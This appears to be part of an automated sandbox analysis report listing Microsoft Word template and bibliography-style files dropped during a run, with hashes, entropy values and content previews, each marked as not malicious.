                                                      Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):250
                                                      Entropy (8bit):3.4916022431157345
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:1A314B08BB9194A41E3794EF54017811
                                                      SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                      SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                      SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):332
                                                      Entropy (8bit):3.547857457374301
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                      SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                      SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                      SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):284415
                                                      Entropy (8bit):5.00549404077789
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:33A829B4893044E1851725F4DAF20271
                                                      SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                      SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                      SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):302
                                                      Entropy (8bit):3.537169234443227
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9C00979164E78E3B890E56BE2DF00666
                                                      SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                      SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                      SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):217137
                                                      Entropy (8bit):5.068335381017074
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                      SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                      SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                      SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):254
                                                      Entropy (8bit):3.4845992218379616
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                      SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                      SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                      SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):6024
                                                      Entropy (8bit):7.886254023824049
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                      SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                      SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                      SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288
                                                      Entropy (8bit):3.523917709458511
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                      SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                      SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                      SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):296658
                                                      Entropy (8bit):5.000002997029767
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                      SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                      SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                      SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):278
                                                      Entropy (8bit):3.5280239200222887
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:877A8A960B2140E3A0A2752550959DB9
                                                      SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                      SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                      SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):268317
                                                      Entropy (8bit):5.05419861997223
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:51D32EE5BC7AB811041F799652D26E04
                                                      SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                      SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                      SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):292
                                                      Entropy (8bit):3.5026803317779778
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:A0D51783BFEE86F3AC46A810404B6796
                                                      SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                      SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                      SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):251032
                                                      Entropy (8bit):5.102652100491927
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F425D8C274A8571B625EE66A8CE60287
                                                      SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                      SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                      SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):262
                                                      Entropy (8bit):3.4901887319218092
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:52BD0762F3DC77334807DDFC60D5F304
                                                      SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                      SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                      SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):5596
                                                      Entropy (8bit):7.875182123405584
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:CDC1493350011DB9892100E94D5592FE
                                                      SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                      SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                      SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):242
                                                      Entropy (8bit):3.4938093034530917
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                      SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                      SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                      SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):4888
                                                      Entropy (8bit):7.8636569313247335
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                      SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                      SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                      SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):280
                                                      Entropy (8bit):3.484503080761839
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:1309D172F10DD53911779C89A06BBF65
                                                      SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                      SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                      SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):9191
                                                      Entropy (8bit):7.93263830735235
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                      SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                      SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                      SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                      Malicious:false
                                                      Reputation:unknown
